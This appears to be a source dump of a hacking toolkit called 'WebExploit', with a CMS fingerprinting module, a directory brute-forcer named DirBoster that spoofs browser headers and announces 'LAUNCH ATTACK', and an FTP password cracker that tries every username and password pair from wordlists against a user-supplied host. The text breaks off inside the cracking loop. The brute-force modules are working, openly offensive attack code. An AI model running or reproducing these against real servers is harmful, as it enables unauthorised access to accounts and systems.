| MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | try: 26 | import time as t 27 | from colorama import Fore as f 28 | import sys, os 29 | import builtwith 30 | from random import choice 31 | except: 32 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 33 | t.sleep(1) 34 | sys.exit() 35 | 36 | black = "\033[0;30m" 37 | red = "\033[0;31m" 38 | green = "\033[0;32m" 39 | brown = "\033[0;33m" 40 | blue = "\033[0;34m" 41 | purple = "\033[0;35m" 42 | cyan = "\033[0;36m" 43 | l_gray = "\033[0;37m" 44 | dark_gray = "\033[1;30m" 45 | l_red = "\033[1;31m" 46 | l_green = "\033[1;32m" 47 | yellow = "\033[1;33m" 48 | l_blue = "\033[1;34m" 49 | l_purple = "\033[1;35m" 50 | l_cyan = "\033[1;36m" 51 | l_white = "\033[1;37m" 52 | faint = "\033[2m" 53 | italic = "\033[3m" 54 | underline = "\033[4m" 55 | blink = "\033[5m" 56 | nefative = "\033[7m" 57 | cross = "\033[9m" 58 | ended = "\033[0m" 59 | bold = "\033[1m" 60 | nbold = "\033[0m" 61 | white = f.WHITE 62 | 63 | bnr = [''' 64 | ▄████▄ ███▄ ▄███▓ ██████ 65 | ▒██▀ ▀█ ▓██▒▀█▀ ██▒ ▒██ ▒ 66 | ▒▓█ ▄ ▓██ ▓██░ ░ ▓██▄ 67 | ▒▓▓▄ ▄██ ▒██ ▒██ ▒ ██▒ 68 | ▒ ▓███▀ ▒▒██▒ ░██▒ ▒██████▒▒ 69 | ░ ░▒ ▒ ░░ ▒░ ░ ░ ▒ ▒▓▒ ▒ ░ 70 | ░ ▒ ░░ ░ ░ ░ ░▒ ░ 71 | ░ ░ ░ ░ ░ ░ 72 | ░ ░ ░ ░ ░ ''', ''' 73 | ▄▄· • ▌ ▄ ·. .▄▄ · 74 | ▐█ ▌▪ ·██ ▐███▪ ▐█ ▀. 75 | ██ ▄▄ ▐█ ▌▐▌▐█· ▄▀▀▀█▄ 76 | ▐███▌ ██ ██▌▐█▌ ▐█▄▪▐█ 77 | ·▀▀▀ ▀▀ █▪▀▀▀ ▀▀▀▀ ''', ''' 78 | ______ ____ ____ _______ 79 | ./ ___ | |_ \ / _| / ___ | 80 | / ./ \_| | \/ | | (__ \_| 81 | | | | |\ /| | '.___\-. 82 | \ \.___.'\ _| |_\/_| |_ |\\____) | 83 | \._____.' |_____||_____| |_______.' '''] 84 | 85 | def r_bnr(bnr): 86 | return choice(bnr) 87 | 88 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 89 | t.sleep(2) 90 | print(f' {italic}From{ended} : ', end='') 91 | #create flush text [simple] 92 | print(f'{red}{bold}', end='', flush=True) 93 | print(f'{bold}W', end='', flush=True) 94 | t.sleep(0.5) 95 | print('e', end='', flush=True) 96 | t.sleep(0.7) 97 | print('b', end='', flush=True) 98 | t.sleep(0.4) 99 | print('E', end='', flush=True) 100 | t.sleep(0.1) 101 | print('x', end='', flush=True) 102 | t.sleep(0.2) 103 | print('p', end='', flush=True) 104 | t.sleep(0.3) 105 | print('l', end='', flush=True) 106 | t.sleep(0.4) 107 | print('o', end='', flush=True) 108 | t.sleep(0.5) 109 | print('i', end='', flush=True) 110 | t.sleep(1.5) 111 | print(f't{ended}', flush=True) 112 | nbold = "\033[0m" # tahe koskholi ! 113 | t.sleep(1) 114 | print(f'{white}{nbold}') 115 | 116 | print (f'\n {bold}{f.GREEN}[{f.WHITE}CMS{f.GREEN}]{f.WHITE}{f.RED} C.M.S{f.WHITE}{bold} C{nbold}ontent {bold}M{nbold}anagement {bold}S{nbold}ystem Detector T00L !\n\n\n') 117 | t.sleep(3) 118 | 119 | 120 | while True: 121 | try: 122 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}C.M.S/{bold}WP-URL{nbold}{f.WHITE} enter \'{bold}URL{nbold}\' [ex: https://youtube.com]:#{f.GREEN}{bold} ') 123 | print(f'{nbold}') 124 | 125 | if url: 126 | if 'http' in url or 'https' in url: 127 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.M.S/{f.CYAN}Skipper{f.WHITE}] SKIPPING ADD {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n') 128 | t.sleep(2) 129 | break 130 | if 'http' not in url or 'https' not in url: 131 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.M.S/{f.CYAN}Adder{white}] AUTOMATICALLY ADDING {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n') 132 | url = (f'http://{url}') 133 | t.sleep(2) 134 | break 135 | else: 136 | continue 137 | except KeyboardInterrupt: 138 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 139 | t.sleep(2) 140 | # break 141 | sys.exit(0) 142 | try: 143 | information_url = builtwith.parse(url) 144 | except Exception as builtwith_error: 145 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}C.M.S/{f.GREEN}GET-CMS-INFO{white}] {nbold}{f.CYAN} ERROR : \' {bold}{builtwith_error}{nbold} \' \n') 146 | t.sleep(3) 147 | sys.exit(0) 148 | try: 149 | for n in information_url: 150 | val = '' 151 | for mji in information_url[str(n)]: 152 | n = n.replace('-',' ') 153 | n = n.title() 154 | val += str(mji) 155 | 156 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}CMS/{f.WHITE}NAME >>>{bold}{f.CYAN} {n} {nbold}{f.WHITE}] {f.WHITE}~> [{f.RED}{bold}{val}{nbold}{f.WHITE}] \n') 157 | t.sleep(0.5) 158 | except Exception as information_url_error: 159 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}C.M.S/{f.GREEN}CMS-INFO-URL{white}] {nbold}{f.CYAN} ERROR : \'{bold}{information_url_error}{nbold}\' \n') 160 | t.sleep(3) 161 | sys.exit(0) 162 | -------------------------------------------------------------------------------- /cores/dirboster.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | import time as t 26 | import os, sys 27 | 28 | try: 29 | from colorama import Fore as f 30 | import requests as r 31 | from fake_useragent import UserAgent 32 | agent = UserAgent() 33 | #import baner 34 | from random import choice 35 | from fake_headers import Headers 36 | except: 37 | print ('\n\033[3m please run \' pip install -r reqirements.txt \' ') 38 | sys.exit() 39 | #------------ 40 | #{f.WHITE}[{f.GREEN}S{f.WHITE}] 41 | bold = "\033[1m" 42 | nbold = "\033[0m" 43 | italic = "\033[3m" 44 | red = "\033[0;31m" 45 | # {bold} 46 | # {nbold} 47 | print(f'{bold}') 48 | print (f'''\033[5m 49 | ░▒█▀▀▄░░▀░░█▀▀▄░▒█▀▀▄░▄▀▀▄░█▀▀░▀█▀░█▀▀░█▀▀▄ 50 | ░▒█░▒█░░█▀░█▄▄▀░▒█▀▀▄░█░░█░▀▀▄░░█░░█▀▀░█▄▄▀ 51 | ░▒█▄▄█░▀▀▀░▀░▀▀░▒█▄▄█░░▀▀░░▀▀▀░░▀░░▀▀▀░▀░▀▀ {nbold}''', end='') 52 | print(f'{italic}From{nbold} : ', end='') 53 | #create flush text [simple] 54 | print(f'{red}{bold}', end='', flush=True) 55 | print(f'{bold}W', end='', flush=True) 56 | t.sleep(0.5) 57 | print('e', end='', flush=True) 58 | t.sleep(0.7) 59 | print('b', end='', flush=True) 60 | t.sleep(0.4) 61 | print('E', end='', flush=True) 62 | t.sleep(0.1) 63 | print('x', end='', flush=True) 64 | t.sleep(0.2) 65 | print('p', end='', flush=True) 66 | t.sleep(0.3) 67 | print('l', end='', flush=True) 68 | t.sleep(0.4) 69 | print('o', end='', flush=True) 70 | t.sleep(0.5) 71 | print('i', end='', flush=True) 72 | t.sleep(1.5) 73 | print(f't{nbold}', flush=True) 74 | 75 | t.sleep(1) 76 | 77 | print (f'\n {bold}{f.GREEN}[{f.WHITE}DIRBOSTER{f.GREEN}]{f.WHITE} {f.RED}DirBoster{f.WHITE}{nbold} advanced tool for find directory AND files in your {bold}TARGET SITE{nbold} !\n\n\n') 78 | t.sleep(3) 79 | print (f'\n {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] enter URL patch file\n') 80 | t.sleep(1) 81 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] Enter URL\'s without [/] \n') 82 | t.sleep(1.5) 83 | print (f' {f.WHITE}[{f.BLUE}{bold}EXAMPLE{nbold}{f.WHITE}] test.com/{f.RED}{bold}etc{nbold}{f.WHITE} [etc => YourPatch]\n') 84 | t.sleep(2) 85 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] Enter For using {bold}DEFAULT PATCH{nbold} FILE \n') 86 | dirss = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}DIRFILE{nbold}{f.WHITE} enter \'DIR\' file for BruteForce[.txt]:#{f.GREEN}{bold} ') 87 | print('') 88 | t.sleep(1) 89 | # print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SET{nbold}{f.WHITE}] {f.CYAN}DirFile{f.WHITE} >>> {bold}{dirs}{nbold}\n') 90 | 91 | #dirs = open(dirs, 'r').read().split() 92 | 93 | try: 94 | dirs = open(dirss, 'r').read().split() 95 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}DirBoster/{f.WHITE}{bold}LOAD-LENGHT{nbold}{f.WHITE}] LOADED {bold} %s {nbold} DirPaths {bold}Successfully...{nbold}\n' % len(dirs)) 96 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SET{nbold}{f.WHITE}] {f.CYAN}DirFile{f.WHITE} >>> {bold}{dirss}{nbold}\n') 97 | t.sleep(1) 98 | 99 | except FileNotFoundError: 100 | filedefault = (f'{os.getcwd()}/cores/wp-plugins.txt') 101 | dirs = open(filedefault, 'r').read().split() 102 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Not Entered {bold}DirPaths{f.WHITE}{nbold}[{bold}{f.YELLOW}FILE{nbold}{f.WHITE}] USING {bold}{f.GREEN}DEFAULT FILE !{nbold}{f.WHITE}\n') 103 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}DirBoster/{f.WHITE}LOAD-{bold}DEFAULT{nbold}{f.WHITE}] LOADED {bold} %s {nbold} DirPaths {bold}Successfully...{nbold}\n\n' % len(dirs)) 104 | t.sleep(1) 105 | 106 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.WHITE}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}] Enter URL With [http://, https://]:#{f.GREEN}{bold} ') 107 | print(f'{nbold}') 108 | t.sleep(0.5) 109 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n') 110 | 111 | if len(url) <= 5: 112 | while True: 113 | try: 114 | print(f'\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] PLZ ENTER A {bold}URL{nbold} !') 115 | print(f'\n {f.WHITE}[{f.RED}{bold}WARNING{f.WHITE}{bold}]CTRL+C{nbold} For Abort !\n') 116 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.RED}/DirBoster/{bold}URL{nbold}{f.WHITE}] Enter URL With [http://, https://]:#{f.GREEN}{bold} ') 117 | print('') 118 | if len(url) <= 5: 119 | continue 120 | else: 121 | break 122 | except KeyboardInterrupt: 123 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 124 | t.sleep(2) 125 | sys.exit(0) 126 | 127 | if 'https://' not in url: 128 | if 'http://' not in url: 129 | print(f'\n {f.WHITE}[{f.YELLOW}{bold}WARNING{f.WHITE}{nbold}] YOU NOT ENTERED URL WITH HTTP:// OR HTTPS:// {bold}{f.CYAN}WebExploit{nbold}{f.WHITE} ADDING {bold}AUTOMATICALLY{nbold} HTTP:// TO {url} !\n') 130 | url = (f'http://{url}') 131 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n\n') 132 | 133 | else: 134 | pass 135 | if url[-1:] == '/': 136 | pass 137 | else: 138 | url = (f'{url}/') 139 | 140 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n') 141 | 142 | slep = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.RED}/DirBoster/{bold}SLEEP{nbold}{f.WHITE}] Enter Delay Time [Default is 3 Sec !]:#{f.GREEN}{bold} ') 143 | print('\n') 144 | 145 | if '.' in slep: 146 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] YOU CAN\'T USING Float\'s in DelayTime ! \n') 147 | print (f' {f.WHITE}[{f.YELLOW}{bold}SET-DEFAULT{f.WHITE}{nbold}] USING Default SLEEP TIME (3 sec) \n') 148 | slep = 3 149 | else: 150 | pass 151 | 152 | try: 153 | slep = int(slep) 154 | t.sleep(int(slep)) 155 | except TypeError: 156 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] type {slep} not int ! \n') 157 | print (f' {f.WHITE}[{f.YELLOW}{bold}SET-DEFAULT{f.WHITE}{nbold}] USING Default SLEEP TIME (3 sec) \n') 158 | slep = 3 159 | 160 | finally: 161 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SLEEP{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{slep}{nbold}\n\n') 162 | 163 | bw_ = ['chrome','firefox','opera'] 164 | os_ = ['win','mac','lin'] 165 | TF = ['True','False'] 166 | 167 | print (f' {f.WHITE}[{f.GREEN}INFO{nbold}{f.WHITE}] Fake {bold}{f.CYAN}HTTP Header{nbold}{f.WHITE} Crated ! \n') 168 | t.sleep(3.5) 169 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{nbold}{f.WHITE}] {bold}DIRBOSTER{nbold} LAUNCH ATTACK . . . \n') 170 | 171 | print (f' {f.WHITE}[{f.GREEN}INFO{nbold}{f.WHITE}] sleeping 5 sec after attack ! \n') 172 | 173 | t.sleep(5) 174 | # start ? 175 | print (f' {f.WHITE}[{f.GREEN}{bold}WEB-EXPLOIT{nbold}{f.WHITE}] ATTACK :\ <\STARTED>! :\\ \n') 176 | for dir in dirs: 177 | t.sleep(slep) 178 | browser = choice(bw_) 179 | operation_system = choice(os_) 180 | T_F = choice(TF) 181 | 182 | headers = Headers( 183 | browser=browser, 184 | os=operation_system, 185 | headers=T_F).generate() 186 | 187 | #headers = {'User-Agent': agent.random} 188 | 189 | # make request 190 | finally_url = (url+dir) 191 | #for debug : 192 | #print (finally_url) 193 | try: 194 | Result = r.get(finally_url, headers=headers) 195 | except Exception as err: 196 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} HAVE {err} ERROR ! IN URL {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n') 197 | continue 198 | if Result.status_code == 200 or Result.status_code in range(0,299): 199 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{bold}{f.GREEN}{Result.status_code}{nbold}{f.WHITE}] FOUNDED {f.WHITE}~> [{f.GREEN}{bold}{finally_url}{nbold}{f.WHITE}] \n') 200 | #elif ? 201 | if Result.status_code == 404: 202 | print (f' {f.WHITE}[{f.YELLOW}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{bold}{Result.status_code}{nbold}{f.WHITE}] NOT FOUND {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n') 203 | #elif ? 204 | if Result.status_code == 403: 205 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}DirBoster/{f.WHITE}STATUS-{bold}{f.RED}{Result.status_code}{nbold}{f.WHITE}]{f.RED} FORBIDDEN {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n') 206 | #elif ? 207 | if Result.status_code in range(499,600): 208 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} SERVER ERROR {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n') 209 | 210 | if Result.status_code == 301 or Result.status_code == 302: 211 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.CYAN} REDIRECT {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n') 212 | 213 | else: 214 | pass 215 | #print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} CAN\'T VERIFY {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n') 216 | 217 | 218 | # DirBoster a tool from WebExploit 219 | 220 | #dirboster() 221 | -------------------------------------------------------------------------------- /cores/fpc.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | from ftplib import FTP 31 | import ftplib 32 | from random import choice 33 | except: 34 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 35 | t.sleep(1) 36 | sys.exit() 37 | 38 | black = "\033[0;30m" 39 | red = "\033[0;31m" 40 | green = "\033[0;32m" 41 | brown = "\033[0;33m" 42 | blue = "\033[0;34m" 43 | purple = "\033[0;35m" 44 | cyan = "\033[0;36m" 45 | l_gray = "\033[0;37m" 46 | dark_gray = "\033[1;30m" 47 | l_red = "\033[1;31m" 48 | l_green = "\033[1;32m" 49 | yellow = "\033[1;33m" 50 | l_blue = "\033[1;34m" 51 | l_purple = "\033[1;35m" 52 | l_cyan = "\033[1;36m" 53 | l_white = "\033[1;37m" 54 | faint = "\033[2m" 55 | italic = "\033[3m" 56 | underline = "\033[4m" 57 | blink = "\033[5m" 58 | nefative = "\033[7m" 59 | cross = "\033[9m" 60 | ended = "\033[0m" 61 | bold = "\033[1m" 62 | nbold = "\033[0m" 63 | white = f.WHITE 64 | 65 | bnr = [''' 66 | )`-.--. /`-. )\.-. 67 | ) .-._( / _ \ / .-._) 68 | \ `-._ ( '-' ( ( . _ 69 | ) ._( ) .._.' ) '..' ) 70 | ( \ ( ' ( . ( 71 | )./ )/ )/'._.' ''', ''' 72 | ______ __ ___ 73 | (_) | /|/ \ /\__) 74 | |__ |___/ | 75 | /| _| | 76 | (_/ | \___/ ''',''' 77 | █████ ██▓███ ▄████▄ 78 | ▓██ ▓██░ ██ ▒██▀ ▀█ 79 | ▒████ ▓██░ ██▓▒ ▒▓█ ▄ 80 | ░▓█▒ ▒██▄█▓▒ ▒ ▒▓▓▄ ▄██ 81 | ▒░▒█░ ▒██▒ ░ ░ ▒ ▓███▀ 82 | ░ ▒ ░ ▒▓▒░ ░ ░ ░ ░▒ ▒ 83 | ░ ░ ░▒ ░ ░ ▒ 84 | ░ ░ ░░ ░ 85 | ░ ░ ░ '''] 86 | 87 | def r_bnr(bnr): 88 | return choice(bnr) 89 | 90 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 91 | t.sleep(2) 92 | print(f' {italic}From{ended} : ', end='') 93 | #create flush text [simple] 94 | print(f'{red}{bold}', end='', flush=True) 95 | print(f'{bold}W', end='', flush=True) 96 | t.sleep(0.5) 97 | print('e', end='', flush=True) 98 | t.sleep(0.7) 99 | print('b', end='', flush=True) 100 | t.sleep(0.4) 101 | print('E', end='', flush=True) 102 | t.sleep(0.1) 103 | print('x', end='', flush=True) 104 | t.sleep(0.2) 105 | print('p', end='', flush=True) 106 | t.sleep(0.3) 107 | print('l', end='', flush=True) 108 | t.sleep(0.4) 109 | print('o', end='', flush=True) 110 | t.sleep(0.5) 111 | print('i', end='', flush=True) 112 | t.sleep(1.5) 113 | print(f't{ended}', flush=True) 114 | nbold = "\033[0m" # tahe koskholi ! 115 | t.sleep(1) 116 | print(f'{white}{nbold}') 117 | 118 | print (f'\n {bold}{f.GREEN}[{f.WHITE}FPC{f.GREEN}]{f.WHITE}{f.RED} F.P.C {f.WHITE}{bold}F{nbold}T{bold}P C{nbold}racker T00L !\n\n\n') 119 | t.sleep(3) 120 | 121 | while True: 122 | try: 123 | host = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}HOST{nbold}{f.WHITE} enter {bold}\'IP or HOST ADDR{nbold}\' [ex: 1.1.1.1, ftp.site.com]:#{f.GREEN}{bold} ') 124 | print(f'{nbold}') 125 | 126 | if host: 127 | break 128 | else: 129 | continue 130 | 131 | except KeyboardInterrupt: 132 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 133 | t.sleep(2) 134 | # break 135 | sys.exit(0) 136 | try: 137 | ftp = FTP(host) 138 | except ftplib.all_errors as ftp_error: 139 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{ftp_error}{nbold}\' \n') 140 | sys.exit(0) 141 | t.sleep(1) 142 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.YELLOW} If You Know {bold}USERNAME {nbold}Give A File With 1 Username !{white}]') 143 | t.sleep(3) 144 | 145 | while True: 146 | usernames = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.WHITE} enter \'USERNAME LIST{nbold}\' [ex: FTP-users.txt]:#{f.GREEN}{bold} ') 147 | if usernames: 148 | try: 149 | users = open(usernames, 'r').read().split() 150 | # users.close() 151 | break 152 | except Exception as file_err: 153 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Usernames{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 154 | t.sleep(1) 155 | continue 156 | t.sleep(1) 157 | 158 | 159 | while True: 160 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/FTP-passwords.txt]:#{f.GREEN}{bold} ') 161 | if passwords: 162 | try: 163 | passes = open(passwords, 'r').read().split() 164 | # passes.close() 165 | break 166 | except Exception as file_err: 167 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 168 | t.sleep(1) 169 | continue 170 | t.sleep(1) 171 | 172 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}FTP-cracker . . . !{nbold}]') 173 | t.sleep(3) 174 | 175 | try: 176 | ftp = FTP(host) 177 | except ftplib.all_errors as ftp_error: 178 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{ftp_error}{nbold}\' \n') 179 | sys.exit() 180 | 181 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER/{nbold}{f.GREEN}ATTACK{bold} launching ATTACK in{white}]', end='', flush=True) 182 | t.sleep(1) 183 | print (' 5 ', end='', flush=True) 184 | t.sleep(1) 185 | print (' 4 ', end='', flush=True) 186 | t.sleep(1) 187 | print (' 3 ', end='', flush=True) 188 | t.sleep(1) 189 | print (' 2 ', end='', flush=True) 190 | t.sleep(1) 191 | print (' 1 ', end='', flush=True) 192 | t.sleep(1) 193 | print (' 0 ', end='', flush=True) 194 | 195 | t.sleep(3) 196 | print(f'\n\n\ {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER/{nbold}{f.YELLOW}ATTACK{green}{bold} LAUNCHED . . .{white}]\n') 197 | try: 198 | for username in users: 199 | for password in passes: 200 | try: 201 | log = ftp.login(username,password) 202 | # if 'OK' in log: 203 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{green}\'{username}{nbold}{white}\' Passowrd: {bold} \'{green}{password}{nbold}{white}\' {bold}{green} 